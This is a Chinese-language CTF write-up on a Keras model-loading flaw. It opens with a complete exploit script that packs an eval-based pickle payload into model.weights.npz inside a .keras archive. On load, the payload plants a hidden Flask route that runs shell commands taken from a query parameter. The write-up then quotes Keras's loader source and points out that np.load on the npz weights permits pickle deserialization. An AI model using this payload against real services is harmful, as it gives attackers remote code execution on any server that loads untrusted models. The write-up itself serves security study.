keras pickle rce

闲来无事在网上看了眼D3的题目当时没做不过写了个新方法

payload

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
import pickle
import zipfile
import json

payload = """
[ __import__('time').sleep(3) for flask in [__import__("flask")] for app in __import__("gc").get_objects() if type(app) == flask.Flask for jinja_globals in [app.jinja_env.globals] for c4tchm3 in [ lambda : __import__('os').popen(jinja_globals["request"].args.get("cmd", "id")).read() ] if [ app.__dict__.update({'_got_first_request':False}), app.add_url_rule("/c4tchm3", endpoint="c4tchm3", view_func=c4tchm3) ] ]
"""



# malicious weights file
class MaliciousPickle:
def __reduce__(self):
return (eval, (payload,))


mal = pickle.dumps(MaliciousPickle())
config = {
"class_name": "InputLayer",
"config": {"batch_shape": [], "dtype": "int64", "name": "encoder_inputs"},
"inbound_nodes": [],
"module": "keras.layers",
"name": "input_layer",
}

with open("config.json", "w") as f:
json.dump(config, f, indent=2)

with open("model.weights.npz", "wb") as f:
f.write(mal)

with zipfile.ZipFile("mal.keras", "w") as zipf:
zipf.write("model.weights.npz")
zipf.write("config.json")

我们首先来看源码
alt text
跟进
alt text
进入load_model来到了我们的主角

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
  

def _load_model_from_fileobj(fileobj, custom_objects, compile, safe_mode):

    with zipfile.ZipFile(fileobj, "r") as zf:

        with zf.open(_CONFIG_FILENAME, "r") as f:

            config_json = f.read()



        model = _model_from_config(

            config_json, custom_objects, compile, safe_mode

        )



        all_filenames = zf.namelist()

        extract_dir = None

        weights_store = None

        asset_store = None

        try:

            if _VARS_FNAME_H5 in all_filenames:

                try:

                    if is_memory_sufficient(model):

                        # Load the entire file into memory if the system memory

                        # is sufficient.

                        io_file = io.BytesIO(

                            zf.open(_VARS_FNAME_H5, "r").read()

                        )

                        weights_store = H5IOStore(io_file, mode="r")

                    else:

                        # Try extracting the model.weights.h5 file, and then

                        # loading it using using h5py. This is significantly

                        # faster than reading from the zip archive on the fly.

                        extract_dir = tempfile.TemporaryDirectory(

                            dir=pathlib.Path(fileobj.name).parent

                        )

                        zf.extract(_VARS_FNAME_H5, extract_dir.name)

                        weights_store = H5IOStore(

                            pathlib.Path(extract_dir.name, _VARS_FNAME_H5),

                            mode="r",

                        )

                except:

                    # If we can't use the local disk for any reason, read the

                    # weights from the zip archive on the fly, which is less

                    # efficient.

                    weights_store = H5IOStore(_VARS_FNAME_H5, zf, mode="r")

            elif _VARS_FNAME_NPZ in all_filenames:

                weights_store = NpzIOStore(_VARS_FNAME_NPZ, zf, mode="r")

            else:

                raise ValueError(

                    f"Expected a {_VARS_FNAME_H5} or {_VARS_FNAME_NPZ} file."

                )



            if len(all_filenames) > 3:

                asset_store = DiskIOStore(_ASSETS_DIRNAME, archive=zf, mode="r")



            failed_saveables = set()

            error_msgs = {}

            _load_state(

                model,

                weights_store=weights_store,

                assets_store=asset_store,

                inner_path="",

                visited_saveables=set(),

                failed_saveables=failed_saveables,

                error_msgs=error_msgs,

            )

        finally:

            if weights_store:

                weights_store.close()

            if asset_store:

                asset_store.close()

            if extract_dir:

                extract_dir.cleanup()



        if failed_saveables:

            _raise_loading_failure(error_msgs)

    return model

可以看出来keras其实是一个zip包含了config.json啊等等cve的打法是通过config.json的恶意加载不过我这里提供一个思路就是打pickle.load 闲来无事我看了下对几个文件的处理
看见对_VARS_FNAME_NPZ 也就是对model.weights.npz的处理时发现了问题所在
alt text
可以看见在NpzIOStore里有一步np.load处理
跟进
alt text
很明显可以打pickle.load